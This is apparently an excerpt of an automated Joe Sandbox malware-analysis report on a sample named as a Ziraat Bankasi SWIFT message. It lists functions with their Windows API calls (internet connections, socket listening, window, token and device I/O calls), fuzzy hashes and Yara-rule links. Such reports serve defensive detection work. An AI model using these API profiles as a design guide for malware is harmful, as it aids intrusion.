Opcode Fuzzy Hash: 3b9eeabf976f350cc8548771bc339a46c2fd51b092089c749c09211170ec7e21
Instruction Fuzzy Hash: 0C31F6309002D8AEEF349B66C81DBFE7FF99B55310F04015AE682B32D2C7B58A85C761

Function 000D4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000D4038
__isleadbyte_l.LIBCMT ref: 000D4066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 000D4094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 000D40CA

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: f89e5739179b1cb83d5868d273a05799a191c4338e77668474f53b7b9d69b63a
Instruction ID: 5af26574267d0f55a46bd635e5ccc40868364a3f05175d80e1c50c1174a3417e
Opcode Fuzzy Hash: f89e5739179b1cb83d5868d273a05799a191c4338e77668474f53b7b9d69b63a
Instruction Fuzzy Hash: A431AF31600306EFDB219F64C849BBE7FE5BF41310F15442AF6659B2A1E731D8A1DBA0

Function 00107CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00107CB9

Part of subcall function 000E5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 000E5F6F
Part of subcall function 000E5F55: GetCurrentThreadId.KERNEL32 ref: 000E5F76
Part of subcall function 000E5F55: AttachThreadInput.USER32(00000000,?,000E781F), ref: 000E5F7D

GetCaretPos.USER32(?), ref: 00107CCA
ClientToScreen.USER32(00000000,?), ref: 00107D03
GetForegroundWindow.USER32 ref: 00107D09

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 549882cbe9b151a7814080c610e1c03d47330869ccbabf9cdfedf59c62354fa9
Instruction ID: 9f567b7265cca299887348e4c3f2ae105b061b585639501e25e1ae585f6cbd5f
Opcode Fuzzy Hash: 549882cbe9b151a7814080c610e1c03d47330869ccbabf9cdfedf59c62354fa9
Instruction Fuzzy Hash: 6D31FF71D00108AFDB10EFA5DC859EFBBF9EF54314B108466E815E7212DA31AE458BA0

Function 0010F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB34E: GetWindowLongW.USER32(?,000000EB), ref: 000BB35F

GetCursorPos.USER32(?), ref: 0010F211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0011E4C0,?,?,?,?,?), ref: 0010F226
GetCursorPos.USER32(?), ref: 0010F270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0011E4C0,?,?,?), ref: 0010F2A6

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: accd5424ee701fab7e989c6a57c8c802cf832c0761427226ac659a45cda06f83
Instruction ID: c0eedac825c6892e7bc24cb89f17b5964c679ae065d401834d25c15d1d2bafe0
Opcode Fuzzy Hash: accd5424ee701fab7e989c6a57c8c802cf832c0761427226ac659a45cda06f83
Instruction Fuzzy Hash: 4F218039500118FFCB258F94DC59EEA7BB5EF09750F088069F945476E1D3B09992DB90

Function 000F431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000F4358

Part of subcall function 000F43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000F4401
Part of subcall function 000F43E2: InternetCloseHandle.WININET(00000000), ref: 000F449E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 80cf2e9fc7be0a8845dc35008b0e6f9985bdf15f62d5aeed6f120adb27e3e62d
Instruction ID: 0135d92659b217fb32162b1b7aef5d4ae4c7e9e8fb5351b5f39e85854cd5e2be
Opcode Fuzzy Hash: 80cf2e9fc7be0a8845dc35008b0e6f9985bdf15f62d5aeed6f120adb27e3e62d
Instruction Fuzzy Hash: 8121CD31200A09BBEB219F60DC01FBBB7E9FF88714F04401ABB1596A50DB719921BBA0

Function 00108A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00108AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00108AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00108ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00108ADC

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: c5c7bdabcf20230818899362b3405367c66d2a7ac457977a0067275064e1fe8d
Instruction ID: 76bcddf9f98795a467799363020c168d1d66ed8c80e89582bfdadaece1afe079
Opcode Fuzzy Hash: c5c7bdabcf20230818899362b3405367c66d2a7ac457977a0067275064e1fe8d
Instruction Fuzzy Hash: 0A11BE31309110AFD714AB18DC05FBA7799BF96320F14411AF8A6C76E2CBB4AC518B90

Function 000F8A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 000F8AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 000F8AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 000F8AFF
WSAGetLastError.WSOCK32(00000000), ref: 000F8B16

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: c7a5c2ee1cb0efcb6cbe11741d2e923ac386afcc929b616d2211f41cdada9aff
Instruction ID: ff35c0c03b9a808a80d232e972752f9eb83883ae13a84b5384ce8d21415abf9e
Opcode Fuzzy Hash: c7a5c2ee1cb0efcb6cbe11741d2e923ac386afcc929b616d2211f41cdada9aff
Instruction Fuzzy Hash: B2219672A00124AFC7219F69DC85ADE7BECEF49314F00816AF949D7251DB7499818F90

Function 000E0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000E1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,000E0ABB,?,?,?,000E187A,00000000,000000EF,00000119,?,?), ref: 000E1E77
Part of subcall function 000E1E68: lstrcpyW.KERNEL32(00000000,?,?,000E0ABB,?,?,?,000E187A,00000000,000000EF,00000119,?,?,00000000), ref: 000E1E9D
Part of subcall function 000E1E68: lstrcmpiW.KERNEL32(00000000,?,000E0ABB,?,?,?,000E187A,00000000,000000EF,00000119,?,?), ref: 000E1ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,000E187A,00000000,000000EF,00000119,?,?,00000000), ref: 000E0AD4
lstrcpyW.KERNEL32(00000000,?,?,000E187A,00000000,000000EF,00000119,?,?,00000000), ref: 000E0AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,000E187A,00000000,000000EF,00000119,?,?,00000000), ref: 000E0B2E

Strings

cdecl, xrefs: 000E0B25

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 52329fc046e053b074c5516c49c47753391f080409cc4a6f0d1fa956c81272fd
Instruction ID: 272c45463c2bb69241e92eb8cdc9eb0f9094806eadec35bc1b77d3429d1264fd
Opcode Fuzzy Hash: 52329fc046e053b074c5516c49c47753391f080409cc4a6f0d1fa956c81272fd
Instruction Fuzzy Hash: EC11D336200345AFDB25AF25DC05DBA77E9FF45314B80402AF806CB250EBB19891C7E1

Function 000D2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 000D2FB5

Part of subcall function 000C395C: __FF_MSGBANNER.LIBCMT ref: 000C3973
Part of subcall function 000C395C: __NMSG_WRITE.LIBCMT ref: 000C397A
Part of subcall function 000C395C: RtlAllocateHeap.NTDLL(00BC0000,00000000,00000001,00000001,00000000,?,?,000BF507,?,0000000E), ref: 000C399F

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 8e9b216a9df277327d2749a278f8576009e10f8371138137e892450181558a97
Instruction ID: 85b5c9224d6244ca6dad853d8271a9cf6b42dc8f1922e2d687bd33d42e2228c9
Opcode Fuzzy Hash: 8e9b216a9df277327d2749a278f8576009e10f8371138137e892450181558a97
Instruction Fuzzy Hash: AE11AB32509316ABDB353B70EC55B9E3FD8AF14360F20493EF84D96253DA70C9409AA1

Function 000E058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 000E05AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 000E05C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 000E05DD
FreeLibrary.KERNEL32(?), ref: 000E0632

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: 088316be0839f3fe84fe8827a2611eb563c4bf2932e2d3e9e4a34a326b1ffb9c
Instruction ID: f492a12ec1b5b047c6f98fbaa440f8dcdfaed57622ac8e354806ee8633a04cb7
Opcode Fuzzy Hash: 088316be0839f3fe84fe8827a2611eb563c4bf2932e2d3e9e4a34a326b1ffb9c
Instruction Fuzzy Hash: F1215171900259FFDB20DF96EC88BDABBB8FF40704F008469E516A6560D7B0EAA5DF50

Function 000E6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 000E6733
_memset.LIBCMT ref: 000E6754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 000E67A6
CloseHandle.KERNEL32(00000000), ref: 000E67AF

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 7a17ccc5c841271a5b7f7d0d93bb87690439eb3adcd32616b87fd32fa5a1008c
Instruction ID: ca1850c49e1b2046f7efef5ef190da860b14478da384166295f721ef98253eba
Opcode Fuzzy Hash: 7a17ccc5c841271a5b7f7d0d93bb87690439eb3adcd32616b87fd32fa5a1008c
Instruction Fuzzy Hash: BD11E7B1901228BAE73097A5AC4DFABBABCEF44764F10419AF504E7180D6704E808B64

Function 000DB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000DAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000DAA79
Part of subcall function 000DAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000DAA83
Part of subcall function 000DAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000DAA92
Part of subcall function 000DAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000DAA99
Part of subcall function 000DAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000DAAAF

GetLengthSid.ADVAPI32(?,00000000,000DADE4,?,?), ref: 000DB21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 000DB227
HeapAlloc.KERNEL32(00000000), ref: 000DB22E
CopySid.ADVAPI32(?,00000000,?), ref: 000DB247

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 42d3a67db0d77ed7345b21d9e4c50cc134a9e4cf740073068930e6acfea9626e
Instruction ID: 248e8593ca0b2c148f7568885b7dc1f0d8ef1485970ecfa4fcde3b595371f5be
Opcode Fuzzy Hash: 42d3a67db0d77ed7345b21d9e4c50cc134a9e4cf740073068930e6acfea9626e
Instruction Fuzzy Hash: BB119D72A00305FFCB249F98DC85ABEB7E9EF85304B15842EE94297311D731AE85CB20

Function 000DB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 000DB498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 000DB4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 000DB4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 000DB4DB

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4edcc615a023f659760ab37f74df52184f205f48f7b598d352c02fce8497f7cc
Instruction ID: d7a5e90066faaf6440e71926e7cc4384f13a9fd878f3617ca970548fadc6641f
Opcode Fuzzy Hash: 4edcc615a023f659760ab37f74df52184f205f48f7b598d352c02fce8497f7cc
Instruction Fuzzy Hash: DE115E7A900218FFDB11DF98C881E9DBBB4FF08700F214091E604B7291D771AE11DBA4

Function 000BB55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 000BB34E: GetWindowLongW.USER32(?,000000EB), ref: 000BB35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 000BB5A5
GetClientRect.USER32(?,?), ref: 0011E69A
GetCursorPos.USER32(?), ref: 0011E6A4
ScreenToClient.USER32(?,?), ref: 0011E6AF

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: ba6df5d237d8567fa2fbf26d73a8a7772b4a99ce37f2c7f9c0fa0cd92e79a2af
Instruction ID: f4cab59af55ed31fe722fa237b23372c0ebabdbaeebb7a68c0fbd1da7a3dd0eb
Opcode Fuzzy Hash: ba6df5d237d8567fa2fbf26d73a8a7772b4a99ce37f2c7f9c0fa0cd92e79a2af
Instruction Fuzzy Hash: 8A11457190012AFFCB24DF98EC859EE7BB9EB08304F400451F942E7141D7B0AA92CBA2

Function 000E732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000E7352
MessageBoxW.USER32(?,?,?,?), ref: 000E7385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 000E739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 000E73A2

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 9996412d41b5092d3e2c69f290f8758324a2ed349a6dea9f46534ff842a6b596
Instruction ID: aa2f7b43ef2b904e1208f1625566a57e0d699eaab1df6f781cdfa0ff06b2fd20
Opcode Fuzzy Hash: 9996412d41b5092d3e2c69f290f8758324a2ed349a6dea9f46534ff842a6b596
Instruction Fuzzy Hash: 4711E172A04244BFD7119FACEC09E9E7BA9AB44311F144219F925E36A1D7B08E5087A1

Function 000D4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 000D4E16

Part of subcall function 000D54F5: __fltout2.LIBCMT ref: 000D551E

__cftog_l.LIBCMT ref: 000D4E3C
__cftoe_l.LIBCMT ref: 000D4E6E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 342abdac1cd9134873eac09340bed444a9704fd142629cceb8778efcc663925f
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 21015E3200024EBBCF525E84DC51CEE3F67BF18355B588456FE1859236D336CAB1ABA1

Function 000C7452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000C7A0D: __getptd_noexit.LIBCMT ref: 000C7A0E

__lock.LIBCMT ref: 000C748F
InterlockedDecrement.KERNEL32(?), ref: 000C74AC
_free.LIBCMT ref: 000C74BF
InterlockedIncrement.KERNEL32(00BD2A18), ref: 000C74D7

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: c4345ea9c908895e40e70b4caf474aebe8fb7bb9a9e2d140a44007bf0926efef
Instruction ID: eebd683d051d6d53db796ea76ee2078d0df78556e47139feae69d24304742d36
Opcode Fuzzy Hash: c4345ea9c908895e40e70b4caf474aebe8fb7bb9a9e2d140a44007bf0926efef
Instruction Fuzzy Hash: 1901C431946711EBC76AAF64A506F9DBBA0BF04711F14410DF818A7A92CB345981CFC2

Function 000C7A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 000C7AD8

Part of subcall function 000C7CF4: __mtinitlocknum.LIBCMT ref: 000C7D06
Part of subcall function 000C7CF4: EnterCriticalSection.KERNEL32(00000000,?,000C7ADD,0000000D), ref: 000C7D1F

InterlockedIncrement.KERNEL32(?), ref: 000C7AE5
__lock.LIBCMT ref: 000C7AF9
___addlocaleref.LIBCMT ref: 000C7B17

Memory Dump Source

